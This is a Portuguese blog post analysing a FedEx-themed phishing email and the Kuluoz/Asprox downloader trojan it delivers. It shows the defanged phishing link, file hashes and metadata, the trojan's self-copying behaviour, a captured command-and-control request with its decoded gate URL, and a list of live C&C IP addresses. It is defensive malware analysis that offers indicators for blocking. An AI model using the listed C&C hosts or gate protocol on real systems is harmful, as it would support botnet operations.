Faz algum tempo eu estava revisando meu email e sempre dou uma olhada na pasta SPAM e hoje achei alguma coisa interessante. Realmente este post saiu porque encontrei esse SPAM já que estou trabalhando em outra coisa bem interessante (próximo post).
O phishing que eu recebi foi esse:
Olhando o código do e-mail podemos perceber que se trata de algo malicioso:
</pre> <font size="2"> <a href="hXXp[:]//hk-studio.net/img/info.php?label=I8UV6j3zv9BuSCW2UmCamGWfPaSlV4EauWFWplwvA9w="> <span style="text-decoration: none; background-color: #4D148C"> <font face="Verdana" color="#FFFFFF">Print Mailing Label</font> <pre>
Resolvi verificar o que realmente havia nesse link e para minha surpresa o nome do arquivo para fazer o download tinha o nome do país que eu estou e também o nome da cidade. Eu realmente fiquei surpreso e logo pensei que estavam utilizando geo-IP para adicionar o nome do país e da cidade para parecer um arquivo real.
Resolvi então tentar o download acessando com um proxy anônimo, e o resultando foi o esperado:
O arquivo ZIP só tem um arquivo dentro chamado “Mailing_Label_ES_CIDADE.exe”:
Analisando o executável ( Para analizar o arquivo eu modifiquei o nome do mesmo).
Resolvi testar uma ferramenta que eu mesmo fiz para a análise de malware:
smurfx@smurfx:checkformal$ python checkformal.py -f Mailing_Label.exe [+] File name: Mailing_Label.exe [+] MD5: fc633eb672734020a1fc44d0ae78d264 [+] Packers info: ['Microsoft Visual C++ v6.0'] [+] Trying to catch some possible Domain/URL/IP/Email from Strings: [!]--> No matched strings found =(. Obfuscated?! [+] Checking VirusTotal database... [+] Detection rate: 11 / 44 [>]McAfee : RDN/Generic.tfr!do [>]Kaspersky : Trojan-Downloader.Win32.Dofoil.qud [>]Emsisoft : Trojan-Downloader.Win32.Kuluoz (A) [>]DrWeb : BackDoor.Kuluoz.4 [>]VIPRE : Trojan.Win32.Kuluoz.b (v) [>]TrendMicro : TROJ_DOFOIL.SMJ [>]McAfee-GW-Edition : Artemis!FC633EB67273 [>]Sophos : Mal/Weelsof-E [>]ESET-NOD32 : a variant of Win32/Kryptik.BFSM [>]Fortinet : W32/DOFOIL.LF!tr [>]Panda : Suspicious file
VIRUS TOTAL RESULT – [CLIQUE AQUI]
Pode ser que se trave do virus “Win32.Kuluoz.b”, pesquisando sobre o mesmo encontrei isso no site da Microsoft: [MICROSOFT ANALYSIS]
O resultado com “exiftool” foi:
ExifTool Version Number : 9.34 File Name : Mailing_Label.exe Directory : . File Size : 44 kB File Modification Date/Time : 2013:08:15 14:53:00+02:00 File Access Date/Time : 2013:08:19 22:22:02+02:00 File Creation Date/Time : 2013:08:19 22:21:58+02:00 File Permissions : rw-rw-rw- File Type : Win32 EXE MIME Type : application/octet-stream Machine Type : Intel 386 or later, and compatibles Time Stamp : 2013:08:15 21:53:42+02:00 PE Type : PE32 Linker Version : 7.10 Code Size : 8192 Initialized Data Size : 36864 Uninitialized Data Size : 0 Entry Point : 0x2706 OS Version : 4.0 Image Version : 0.0 Subsystem Version : 4.0 Subsystem : Windows GUI File Version Number : 1.0.0.0 Product Version Number : 1.9.0.0 File Flags Mask : 0x0017 File Flags : (none) File OS : Win32 Object File Type : Executable application File Subtype : 0 Language Code : English (U.S.) Character Set : Windows, Latin1 Company Name : Like File Description : For test purpose on1y! Original Filename : mein.exe
Com o Regshot podemos ver que ele criou um outro arquivo:
———————————-
Files added:2
———————————-
C:\Documents and Settings\Smurfx\Desktop\Mailing_Label.txt
C:\Documents and Settings\Smurfx\Local Settings\Application Data\hoawdsmm.exe———————————-
Files deleted:1
———————————-
C:\Documents and Settings\Smurfx\Desktop\Mailing_Label.exe
Como podemos observar ele cria automaticamente um arquivo chamado “hoawdsmm.exe” e também cria um chamado “Mailing_Label.txt” e depois ele se auto apaga.
O conteúdo do arquivo TXT é esse:
RECIPIENT: Mark Smith
LOCATION OF YOUR PARCEL: Los Angeles
STATUS OF YOUR ITEM: not delivered
SERVICE: Standard Shipping
ITEM NUMBER:U2342364242354-US
INSURANCE: Yes
Comparando os md5 dos dois arquivos podemos ver que o segundo arquivo criado é exatamente uma cópia do primeiro:
MD5 (Mailing_Label.exe) = fc633eb672734020a1fc44d0ae78d264
MD5 (hoawdsmm.exe) = fc633eb672734020a1fc44d0ae78d264
Ele criou um processo com svchost.exe:
E verifiquei que o processo estava tentando conectar com servidores na internet:
Podemos comprovar que o arquivo tenta conectar com vários IPs diferentes:
Seguindo a dica do @Secluded_Memory utilizei o honeyd para conseguir mais informação sobre o que o malware está tentando acessar:
Tudo indica que é um C&C e que conecta a seus servidores esperando um comando específico:
* Connected to 88.84.162.12 (88.84.162.12) port 587 (#0)
> GET /B69343EE237D517E73AF029EE73A73A1602509FBEE673AD30A2015424D86E9FF636EA743620D2337FFA477F73AFD0654FD7360B155D3F18D1FF47397CC1B59CED21253AC3B382C2C8F093A92 HTTP/1.1
> User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
> Host: 88.84.162.12:587
> Accept: */*
>
< HTTP/1.1 200 OK
* Server nginx/1.2.6 is not blacklisted
< Server: nginx/1.2.6
< Date: Fri, 16 Aug 2013 08:44:17 GMT
< Content-Type: text/html
< Content-Length: 5
< Connection: close
< X-Powered-By: PHP/5.4.4-7
< Vary: Accept-Encoding
<
* Closing connection 0
c=idl
Como podemos observar o comando é “c=idl”.
O malware se comunica com seu CnC através de mensagens cifradas com o o algoritmo RC4, se decodificamos a requisição:
GET /B69343EE237D517E73AF029EE73A73A1602509FBEE673AD30A2015424D86E9FF636EA743620D2337FFA477F73AFD0654FD7360B155D3F18D1FF47397CC1B59CED21253AC3B382C2C8F093A92
E decodificada:
/index.php?r=gate&id=B69343EE283C9EF3F33183676B2DB2A8&group=1508&debug=0
Fiz um script para testar se os IPs estão ativos ou não:
smurfx@smurfx:FedexSpam$ ./check_CC_Fedex.sh ips.txt
Checking if the IPs are still serving as c&c…
Processing the file ips.txt
46.234.101.195 OK
177.70.22.8 c&c active…
88.84.162.12 c&c active…
103.4.19.111 c&c active…
196.214.85.82 c&c active…
85.214.223.42 c&c active…
smurfx@smurfx:FedexSpam$ date
Mon Aug 19 22:14:21 CEST 2013
Conclusão:
Malwares estão cada vez mais sofisticados e cada vez mais pessoas sem conhecimentos técnicos estão caindo nessas armadilhas. Nossa obrigação é alertar e tentar proteger os usuários desse tipo de criminosos.
Você pode bloquear esse IPs em sua empresa, já que eles estão sendo utilizados como c&c servers.
Gostaria de agradecer outra vez ao @Secluded_Memory que me deu alguns conselhos por onde ir nesse caminho.
Update: Agradeço também ao @herrcore por me passar um paper da TrendMicro sobre o assunto, vale a pena conferir: WP-Asprox-Reborn.pdf
#MalwareMustDie
Happy Hunting =)